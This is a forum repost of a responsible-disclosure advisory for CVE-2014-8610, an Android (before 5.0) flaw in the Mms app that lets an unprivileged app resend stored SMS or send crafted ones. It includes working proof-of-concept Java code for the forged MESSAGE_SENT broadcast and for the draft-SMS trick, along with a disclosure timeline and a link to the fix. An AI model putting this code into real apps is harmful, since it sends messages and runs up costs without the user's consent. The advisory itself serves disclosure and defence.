Jump to content
Nytro

CVE-2014-8610 Android < 5.0 SMS resend vulnerability

Recommended Posts

Posted

CVE-2014-8610 Android < 5.0 SMS resend vulnerability

From: "Wang,Tao(Scloud)" <wangtao12 () baidu com>

Date: Wed, 26 Nov 2014 02:55:01 +0000

INTRODUCTION

==================================

In Android <5.0, an unprivileged app can resend all the SMS stored in the user's phone to their corresponding

recipients or senders (without user interaction).

No matter whether these SMS are sent to or received from other people. This may leads to undesired cost to user.

Even the worse, since Android also allow unprivileged app to create draft SMS, combined with this trick, bad app can

send any SMS without privilege requirement.

DETAILS

==================================

This vulnerability exists in the following source file of the Mms app:

https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java

If bad app broadcast an intent with action "com.android.mms.transaction.MESSAGE_SENT", it will reach the method

"handleSmsSent". If the bad app can also control the resultcode to be RESULT_ERROR_RADIO_OFF, then it will reach the

following conditional branch, there the SMS (determined by uri ) will be moved to a queue to be resent:

private void handleSmsSent(Intent intent, int error) {

...

} else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode ==

SmsManager.RESULT_ERROR_NO_SERVICE)) {

if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {

Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);

}

// We got an error with no service or no radio. Register for state changes so

// when the status of the connection/radio changes, we can try to send the

// queued up messages.

registerForServiceStateChanges();

// We couldn't send the message, put in the queue to retry later.

Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);

...

The POC code is as follows:

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");

intent.setData(Uri.parse("content://sms"));

intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");

sendOrderedBroadcast(intent,null,null,null,SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

Some tips about the POC:

1. uri is content://sms without specifying the ID, that means all the SMS will be resent.

2. must use explicit intent

3. with this version of sendOrderedBroadcast, the initial result code can be controlled

Normally, once the SMS is moved to the queue, it will be sent automatically!

But can we craft any SMS message? here is a trick:

Currently, any app can create a draft SMS without permission by a code snippet as follows:

Intent intent1 = new Intent("android.intent.action.SENDTO");

intent1.setData(Uri.parse("smsto:yourphonenumber"));

intent1.putExtra("sms_body", "another test sms1!");

startActivity(intent1);

After send the above intent, the app can wait for a short time then start another activity, this will cause

ComposeMessageActivity in MMS app to call method onStop(), which will save the draft into database, which can be resent

later. Thus we can craft any SMS message without permission requirement.

This has been fixed in android 5.0 (android bug id 17671795)

https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67

TIMELINE

==================================

26.09.2014 Initial report to Android Security Team with the POC

27.09.2014 Reply from Android Security Team "are looking into it"

30.09.2014 Find app can create draft and notify Android Security Team with a updated POC

02.10.2014 Reply from Android Security Team "We will fix this issue in the next major release"

04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team

when this can be published

09.11.2014 Contact MITRE about this issue

20.11.2014 CVE-2014-8610 assigned

25.11.2014 Got Permission from Android Security Team to publish this

26.11.2014 Public Disclosure

IDENTIFIERS

==================================

CVE-2014-8610

Android id 17671795

CREDITS

==================================

WangTao (neobyte) of Baidu X-Team

WangYu of Baidu X-Team

Zhang Donghui of Baidu X-Team

--

BAIDU X-TEAM (xteam.baidu.com)

An external link of this advisory can be found at CVE-2014-8610 Android < 5.0 SMS resend vulnerability | ?????????

Sursa: Full Disclosure: CVE-2014-8610 Android < 5.0 SMS resend vulnerability

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...